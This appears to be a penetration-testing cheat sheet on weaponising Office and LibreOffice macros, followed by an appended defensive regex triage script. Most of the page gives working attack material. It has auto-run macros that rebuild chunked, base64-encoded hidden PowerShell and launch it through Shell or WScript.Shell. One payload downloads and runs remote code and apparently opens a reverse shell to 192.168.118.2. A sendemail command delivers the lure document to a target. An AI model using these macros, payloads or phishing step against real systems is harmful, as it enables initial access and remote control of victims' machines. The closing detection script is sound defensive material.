Office Macros

We will show here some methods to create macro payloads for Office documents.


LibreOffice

First we need to split our payload into chunks, as macros have a limit of 50 characters. We can achieve this with the script below:

s = "<payload>"
n = 50
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')

Then we can add the payload as follows in a LibreOffice macro document.

Sub Exploit	
	Dim Str As String
	
	Str = Str + "cmd /c powershell.exe -nop -w hidden -e aQBmACgAWw"
	Str = Str + "BJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0"
	Str = Str + "ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAH"
	[snip]
	...
	[snip]
	Str = Str + "BwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABp"
	Str = Str + "AGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0AC"
	Str = Str + "gAJABzACkAOwA="
	
	Shell(Str)
End Sub

Then we can send an email using sendemail as seen below:

sendemail -f 'cub3@localhost' -t 'target@localhost' -s 192.168.248.140:25 -u 'Contact Information' -m 'Here the contact information you requested' -a doc.ods

We should then receive a reverse shell, but we should also try other payloads. Below is one other payload, which worked well against Windows machines.

Sub Payday
	Set oShell = CreateObject("Wscript.Shell")
	oShell.Run("<payload>", 0)
End Sub	

To make the macro start when opening the file we need to navigate to Tools -> Customize -> Events. Then we need to assign our macro to the OpenDocument Event.


Microsoft Office

We will show below how we can create a macro document which can be used to get initial access.

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    [snip]
    ...
    [snip]
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
    
    CreateObject("Wscript.Shell").Run Str
End Sub

We use the same python3 script we used above to split our payload into string chunks.
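
The chunked `Str = Str + "..."` layout shown in both sections is itself a useful detection signal. The following is an added example for triaging extracted macro source, not code from the original page. The function name `triage`, the finding labels and both sample macros are constructed for illustration. The LibreOffice OpenDocument event binding is configured outside the macro source, so it is not covered here.

```python
import re

# Patterns for what the macros on this page do: self-appending string chunks,
# auto-run Sub names, process-launch calls, encoded and hidden PowerShell flags.
CHUNK = re.compile(r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*"([^"]*)"\s*$', re.I | re.M)
AUTOEXEC = re.compile(r'^\s*Sub\s+(AutoOpen|Document_Open)\b', re.I | re.M)
SINK = re.compile(r'\bShell\s*\(|CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I)
ENCODED_PS = re.compile(r'powershell(\.exe)?\b.*?\s-(e|enc|encodedcommand)\s', re.I)
HIDDEN = re.compile(r'\s-w\s+hidden\b', re.I)

def triage(source, min_chunks=3):
    """Return sorted finding names for one macro module's source text."""
    findings = set()
    if AUTOEXEC.search(source):
        findings.add("autoexec-entry-point")
    if SINK.search(source):
        findings.add("process-launch-call")
    # Rebuild each variable's string so flags split across chunks are still seen.
    rebuilt = {}
    for var, chunk in CHUNK.findall(source):
        rebuilt.setdefault(var.lower(), []).append(chunk)
    for chunks in rebuilt.values():
        joined = "".join(chunks)
        if len(chunks) >= min_chunks:
            findings.add("chunked-string-reassembly")
        if ENCODED_PS.search(joined):
            findings.add("encoded-powershell-command")
        if HIDDEN.search(joined):
            findings.add("hidden-window")
    return sorted(findings)

# Constructed samples; PLACEHOLDER stands in for an encoded blob.
SUSPICIOUS = '''Sub AutoOpen()
    MyMacro
End Sub
Sub MyMacro()
    Str = Str + "powershell.exe -nop -w hidden -e"
    Str = Str + "nc PLACEHOLDERPLACEHOLDERPLACEHOLDER"
    Str = Str + "PLACEHOLDER=="
    CreateObject("Wscript.Shell").Run Str
End Sub
'''
BENIGN = '''Sub Greeting()
    Msg = Msg + "Quarterly totals are on "
    Msg = Msg + "sheet two."
    MsgBox Msg
End Sub
'''
print(triage(SUSPICIOUS), triage(BENIGN))
```

In the constructed sample the `-enc` flag is split across two chunks, so a line-by-line match misses it and only the reassembled string reveals it.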
